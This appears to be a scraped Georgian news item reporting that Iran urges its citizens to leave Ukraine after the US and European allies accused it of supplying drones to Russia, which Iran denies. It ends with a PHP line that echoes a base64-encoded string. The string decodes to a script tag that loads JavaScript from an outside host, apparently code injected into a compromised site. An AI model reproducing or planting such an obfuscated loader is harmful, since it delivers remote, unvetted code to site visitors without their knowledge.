celsiusi
ავერსი შნაიდერი
გააქტიურებული სამხედრო შეტაკებებისა და გაზრდილი არეულობის გამო, ირანის ხელისუფლება თავის მოქალაქეებს უკრაინის დატოვებისკენ მოუწოდებს, ხოლო მათ, ვინც უკრაინაში გამგზავრებას გეგმავს, თავის შეკავებას ურჩევს.
 
მედია იუწყება, რომ აღნიშნული მოწოდება ირანის ხელისუფლებამ მას შემდეგ გაავრცელა, რაც აშშ-მა და ევროპელმა მოკავშირეებმა ირანი უკრაინაში გამოსაყენებლად რუსეთისთვის დრონების მიწოდებაში დაადანაშაულეს.
 
ამასთან, როგორც სახელმწიფო დეპარტამენტის პრესსპიკერმა ნედ პრაისმა მიმდინარე კვირას განაცხადა, აშშ-ს აქვს მრავალი მტკიცებულება, რომ ირანული დრონები უკრაინის მოსახლეობასა და სამოქალაქო ინფრასტრუქტურაზე დარტყმებისთვის გამოიყენება.
 
ირანი რუსეთისთვის უკრაინაში გამოსაყენებლად შეიარაღების მიწოდებას უარყოფს.
429
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");